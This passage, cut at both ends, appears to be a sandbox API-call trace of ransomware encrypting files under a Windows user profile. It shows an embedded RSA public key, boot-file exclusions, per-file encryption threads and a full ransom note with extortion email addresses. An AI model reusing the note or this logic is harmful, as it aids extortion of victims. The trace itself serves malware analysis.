f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.435] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0201.436] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdf8 [0201.436] WaitForSingleObject (hHandle=0xdf8, dwMilliseconds=0xffffffff) returned 0x0 [0201.438] Sleep (dwMilliseconds=0x96) [0201.589] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.589] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0201.589] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0201.589] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0201.589] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="ntldr") returned 0x0 [0201.589] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="NTLDR") returned 0x0 [0201.589] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="NTDETECT.COM") returned 0x0 [0201.589] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="ntdetect.com") returned 0x0 [0201.589] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0201.589] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0201.589] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.589] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0201.589] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdfc [0201.590] Sleep (dwMilliseconds=0x96) [0201.744] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.745] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0201.745] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0201.745] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0201.745] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntldr") returned 0x0 [0201.745] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTLDR") returned 0x0 [0201.745] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTDETECT.COM") returned 0x0 [0201.745] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntdetect.com") returned 0x0 [0201.745] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0201.745] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0201.745] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.745] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0201.745] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe00 [0201.746] Sleep (dwMilliseconds=0x96) [0201.900] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0201.900] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0201.901] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0201.901] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0201.901] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntldr") returned 0x0 [0201.901] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0201.901] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0201.901] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0201.901] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0201.901] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0201.901] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.901] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0201.901] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe04 [0201.902] Sleep (dwMilliseconds=0x96) [0202.056] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.056] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0202.057] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0202.057] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0202.057] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntldr") returned 0x0 [0202.057] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0202.057] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0202.057] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0202.057] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0202.057] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0202.057] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.057] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0202.057] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0202.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe08 [0202.058] Sleep (dwMilliseconds=0x96) [0202.213] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.213] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0202.213] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0202.213] StrStrW (lpFirst="ntuser.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0202.213] StrStrW (lpFirst="ntuser.ini", lpSrch="ntldr") returned 0x0 [0202.213] StrStrW (lpFirst="ntuser.ini", lpSrch="NTLDR") returned 0x0 [0202.213] StrStrW (lpFirst="ntuser.ini", lpSrch="NTDETECT.COM") returned 0x0 [0202.213] StrStrW (lpFirst="ntuser.ini", lpSrch="ntdetect.com") returned 0x0 [0202.213] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0202.213] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\") [0202.213] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.213] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0202.213] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0202.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe0c [0202.214] Sleep (dwMilliseconds=0x96) [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.369] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0202.369] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 1 [0202.369] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 0 [0202.369] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0202.369] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\*.*") returned="C:\\Users\\Default\\*.*" [0202.369] SetErrorMode (uMode=0x1) returned 0x1 [0202.369] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT") returned 38 [0202.370] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0202.370] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.370] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0xe10) returned 0x0 [0202.370] RegQueryValueExW (in: hKey=0xe10, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b9138, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x43b9138*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0202.370] RegCloseKey (hKey=0xe10) returned 0x0 [0202.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0202.370] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0202.370] CreateFileW (lpFileName="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0202.370] CreateFileW (lpFileName="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0202.371] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0202.371] PathFindFileNameW (pszPath="C:\\Users\\Default") returned="Default" [0202.371] lstrcpyW (in: lpString1=0x17d784, lpString2="Default" | out: lpString1="Default") returned="Default" [0202.371] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0202.371] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0202.371] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.371] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0202.371] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0202.371] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0202.371] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0202.371] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0202.371] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0202.371] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0202.371] SetErrorMode (uMode=0x1) returned 0x1 [0202.372] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0202.372] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0202.372] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\AppData\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0202.372] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*" [0202.372] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0202.372] PathFindFileNameW (pszPath="C:\\Users\\Default\\AppData") returned="AppData" [0202.372] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0202.372] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0202.372] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0202.372] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*" [0202.372] SetErrorMode (uMode=0x1) returned 0x1 [0202.372] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT") returned 46 [0202.372] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0202.373] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0202.373] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xe14) returned 0x0 [0202.373] RegQueryValueExW (in: hKey=0xe14, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b9368, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b9368*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0202.373] RegCloseKey 